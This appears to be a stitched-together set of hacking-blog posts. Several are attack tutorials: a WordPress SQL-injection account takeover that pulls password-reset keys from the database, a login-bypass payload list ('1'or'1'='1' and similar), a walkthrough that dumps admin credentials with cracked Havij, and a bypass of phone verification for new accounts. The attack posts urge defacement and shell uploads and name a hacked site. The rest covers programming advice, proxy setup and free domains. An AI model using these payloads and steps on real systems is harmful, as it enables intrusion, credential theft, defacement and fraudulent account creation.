Hacking Wordpress Without Hash Cracking

The title says am going to show u how to hack a wordpress site without cracking the hashes.Now this works with all the wordpress sqli exploits ever posted in any of its themes or plugins.
Point to remember: 
You cannot exploit the latest version of wordpress with this [3.4.2] which was released on 6th -september 2012 yea u heard it right released this month now there are still tons of websites out there which haven't been updated yet all the previous version can be exploited using this method ..
Things u need
1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe

1) My Dork

There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is.

Now paste this code in google.com (one of my best frnds) and u will see no. of vulnerable websites.
2) Now the website im going to use here is

Here the parameter userid is vulnerable to sqli. So lets see what we can get from the data base.Im going to change the above URL with this :

Now u can see we got the username with the email id
Now if i change the above URL to this :

Im going to get the user name and the hashed password
Point to be noted here :  Im using concat here .. u can also use group_concat to get all the users again that would be ur knowledge how u use sqli.
Now we all know that wordpress hashes belong to the category MD5(wordpress)(different from simple MD5) and are very hard to crack but if ur mad u should think out of the box
So now follow the steps
a) Go to the login page of of wordpress site .. in my case that would be.
 b) Click on Lost your password ?
c) Now the wordpress will ask me for the username or email for which i want to reset the password in my case that is 'masaru' so go ahead and enter the username .

d) Now look closely it says "Check your e-mail for the confirmation link."
e) Now what wordpress does actually it sends an activation key to the email address of that user and it sets the value of activation key in the database aswell what u have to do is just to get that key .. 
f) So now im going to change my URL to this to get the activation key

And u can see we got the activation key here u should note it down somewhere.
g) Now finally all we have to do is without going to the email address reset the password for that im going to add this to my URL .
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

And im going to replace the KEYHERE with the activation key i got and the USERNAME HERE with the username which in my case is 'masaru' so my URL will be :

The wordpress will ask u for ur new password
Now go the login page again and try the new password and there u go u got access to the panel
Now to chk quickly if a website is using the latest version 3.4.2 or previous versions goto the login page and see if there is an option there to go back to the main page of the blog like in my case see the option : like in my case see the option : -- Back to Digital Way of Living then this is not 3.4.2 if u don't see this option .. then it is 3.4.2 this trick is not legit i figured it out and is working for me :
Hope you will like this .. : ) 
Hacked WordPress site : http://standzahra.id1945.com/


You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection). I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.


Try to make your own dorks also to get more success rate :

Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1
Use the above mentioned login details and you will be into the admin panel of a website. It will not work for all the websites you will find, but will work on most of the websites.

Other InjecTion Queries:

‘ or 1=1 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

100 % Working Bypass Mobile Number Verification in Gmail,Fb,Yahoo,etc

First of all , Visit this website.


In that website You can find some numbers.
Choose one number & click it.
Then Copy that mobile number & put that mobile number wherever verification code asks !!
Finally , u will receive verification code in that website..
Thats it !!!

This method will be very useful while u r creating a new accounts like gmail,yahoo,etc.
This will receive almost all Verification Codes !!
Hope it will works fine ...

Which Programming Language Should I Learn For Hacking ?

Why Programming
So the first question many people will ask is why should i learn any programming language when there are so many tools and Frameworks such as MSF (Metasploit framework) to do my job. All i need to know is how the tool works and what is the purpose of it ?. The Answer for the question is both an Yes and No, You can become a Pentester/Hacker without knowing any programming but how ever your not going to become a good  pentester /Hacker.
So Knowing Programming Will
Differentiate you from Script kiddies and Tool Lovers
Help You in Understanding About Vulnerabilities
Help You in writing Your own tools, scripts
Help You in writing exploits, Shell codes etc
Help You modifying Existing scripts, tools according to your needs

Which Programming Language to Learn ?
So now that you have understood the importance of knowing programming, The next question in your mind is which programming language should i learn, The answer for this question depends on your interests and goals

For Web App Pentesting /Hacking
Hypertext Markup Language (HTML) is the basics for creating web pages and other information that can be displayed in a web browser. So if you don't know HTML you should first learn it
Learning java script. Will help you understand the basics of Cross Site Scripting
Majority of web applications are written using PHP and MySQL .So it is a must to learn PHP

For Writing / Understanding Exploits, Shell Codes, Root kits etc
C & C++
More than 60 % of the exploits you will find on the web are written in C & C ++, Learning C & C++ will help you understand about Buffer overflows, Stack overflow etc, So learning C and C ++ is must for every hacker/Pen tester
Learning assembly will help you in Writing/understanding Shell codes , Will Help you in Reverse Engineering applications and software's

For Building Tools And Scripts
Python is a very powerful high level language , Its Easy to learn and code, most of the tools and scripts for automation are written in Python . Knowing Python socket programming will help you a lot in Exploit writing
Ruby is an another language which is used to write scripts, tools. Metasploit Frame Work is written in Ruby. so learning ruby will help you understand the in and outs of msf
Learning Bash is very Useful in writing small scripts for automatio

How To Use A Proxy Server Online To Become Anonymous All Browsers

This is a simple tutorial on how to become anonymous online and add a proxy to your chosen browser.
To get a proxy list use google or these sites http://spys.ru or http://proxy-list.org or http://www.hidemyass.com/proxy-list/

This guide shows you how set up your browser to work with an (anonymous) HTTP proxy server.
The proxy address along with the port number should look like this:
The address is “″. The port is the part behind the colon, “1789″.
Caution: (Please do not attempt to use the above example as it is only numbers pulled from the air and not intended to be used).
Please note: Sooner or later your proxy will stop working or it may not work from the start … even if you properly tested it first. Regardless, when it doesn’t work, simply repeat the process with another proxy.

Firefox 2.x and 3.x
Setting up Mozilla Firefox to use a proxy is a simple and straight forward task. It only differs a bit on each operating system.
Run Firefox.
Click Tools from the menu bar.
Click the Options menu item.
Now click the Advanced icon at the right side.
Click the Network tab.
In the Connection field, click Settings
Click Manual proxy configuration:
Enter your selected proxy it in the correct field. The first field is the address, the second field is the port. If you are using a HTTP proxy then click the box for, “Use this proxy server for all protocols“.
Click OK.
Click Close.
It should not be necessary to restart Firefox.
* * * * * * * * * **
Internet Explorer 5.x, 6.x, 7.x with a LAN, DSL or Cable connection:
This method will only work when you are not connected over a dial-up modem. If you are using a dial-up modem, look at the instructions below.
Open Internet Explorer.
Click the Tools item in the menu bar, in Internet Explorer 7 it is a button at the right side.
Now click the Internet Options menu item.
Click the Connections tab.
In the “LAN-Settings” field, click Settings
In the Proxy server field, make sure the Use a proxy server for your LAN box is checked.
Enter the the proxy’s IP in the Address box, and the Port in the Port box.
Click OK.
Click OK again.
It should not be necessary to restart Internet Explorer.
Firefox 2.x and 3.x
Click Firefox in the menu bar.
Click the Preferences menu item.
Now click the Advanced icon at the right side.
Click the Network tab.
In the Connection field click Settings
Click at Manual proxy configuration.
Now, according to the proxy type you use, enter it in the correct field. The first field is the address, the second field is the port.
Click OK.
Click Close.
It should not be necessary to restart Firefox.

If you have cookies left in your browser, sites may identify you by using them. Therefore, if your goal is to be anonymous, then delete all cookies before using an anonymous proxy. You can also be identified as a specific user if you login to your existing accounts with your proxy connection, if you have previously logged in with your (real) IP. As a result, you always sign up for new separate account that you use only with your proxy or proxies.

Hack A Site EASY [ SQL Inject With Havij v1.16 ]

This is a simple tutorial on how to hack sites with Havij v1.16 
In this tutorial I assume that you already know how to find a vulnerable site, and I wont go through that part.

Knowledge is free, but the one who are reading this are responsible for how they use this knowledge.
Please note that this is Illegal in most countries.

With that said, download Havij v1.16 Pro for free (Cracked) and follow the steps.
Download from here OR you may find the file in google :   Haviji v1.16

Hidden Content:
    Step 1 - Analyze target and find Database
1. First find a vulnerable site, and then copy the URL of it.
2. In Havij, paste the vulnerable link in the 'Target' section as shown below:
3. Press 'Analyze'
Now you will get information about the site such as Host IP, Web Server etc.
Here the Database is called 'Vize' as shown in the picture under 'Current Database'.
Step 2 - Get Tables and Columns
    1. Head over to the 'Tables' section and press 'Get Tables'.
Picture 1
So here is our victims Tables:
2. Now select 'users' or any other relative Table and click 'Get Columns'.
Picture 1
3. Now you should have some columns called things like 'ID', 'Usernames', 'Passwords' or something similar.
In this case we had 'login' and 'passwd' and it seemed to be relevant.
Step 3 - Get Admins login details
       1. Select all relative columns and press 'Get Data'
1. Go to the 'Find Admin' section and press 'Start'.
It'll now start scanning
Success! Here is our admin page!
2. Go to the URL and Log In with the admin credentials we found in Step 3, have fun!

Top 10 Websites To Register Your Domain For Free

Hello Guys , i know many of you wanted to get a free domain registration , so i collected some for you , 
These are the 13 Website registrars who registers you a free domain and Web Hosting. 
Register your Free Domain Now!!

1) .tk
 Dot TK is a FREE domain registry for all websites on the Internet. It has exactly the same power as other domain extensions, but it’s free! Because it’s free, millions of others have been using .TK domains since 2001 – which makes .TK powerful and very recognizable. Your website will be like http://www.yourdomainname.tk .
It is free for 1 year. It’s a ccTLD domain whixh having the abbreviation Tokelau.
To create a .tk domain, Visit  http://www.dot.tk
2) co.cc
Co.cc is completely free domain which is mostly used by blogspot bloggers because of it’s easy to use DNS system. Creating a co.cc for blogger is simple . Your website will be like http://www.yourdomainname.co.cc 
To create a .co.cc domain, visit http://www.co.cc
3) co.nr
 co.nr is too like co.cc. Your website will be like http://www.yourdomainname.co.nr .
You can add it for blogger also..
To create a .co.cc domain, visit http://www.co.nr
4)  .free
It’s also a free domain registrar which has the offcial applicants of Google,Amazon, Dotnuts, etc…
It’s very simple to register. Your domain name will look like this http://www.yourblogname.free .
To create a .free domain, visit http://www.dotfree.com/
5) com.nu
com .nu is also like co.nr domain and it provides a free web hosting. You can register many domains than com.nu like 1x.de, 1x.biz, etc… To know the features of that website go to: http://www.com.nu/features
Your domain will be look like http://www.example.com.nu .
To create a .free domain, visit http://www.com.nu .
6) indiagetonline (only for residents of India)
This is the who had partnership with Google, Hostgator, ICICI bank and Federation of Micro, Small and Medium Enterprises . In this website you can registed a ccTLD domain that is .in Domain 1 year for free. This website has more features. It offers a free website builder with 365 days free online support !!!. Your website will look like this- http://www.example.in .
To create a free .in domain for 1 year, visit http://www.indiagetonline.in
7) tipdots
You can a free domain for ever. The features of the domains of this website is present on http://www.tipdots.com/features . You can register many domains with the last word as .tp like http://www.example .us.tp , http://www.example.ca.tp , etc..
You can register free domains by visiting http://www.tipdots.com/
8) biz.nf
 Biz.nf is a both free and paid domain registrar that you can register a free domain or a paid domain like .com , .net, etc..  You can register free domains like http://www.example.biz.nf ,www.example.co.nf
It also offers free hosting.
To register a biz.nf or co.nf free domain, visit   http://www.biz.nf
9)  smartdots
It’s also a free domain provider.
That allows you to register domains such as http://www.example.net.tc , http://www.example.eu.tc , etc..
To create a Free domain in that website, visit http://www.smartdots.com
10) unonic
It’s also a free domain provider. The features of the domains which you register in unonic.com will be present on this following link : http://www.unonic.com/features/
It offers you to register domains like http://www.example.net.tf , http://www.example.eu.tf , etc….
To register a free domain with unonic visit http://www.unonic.com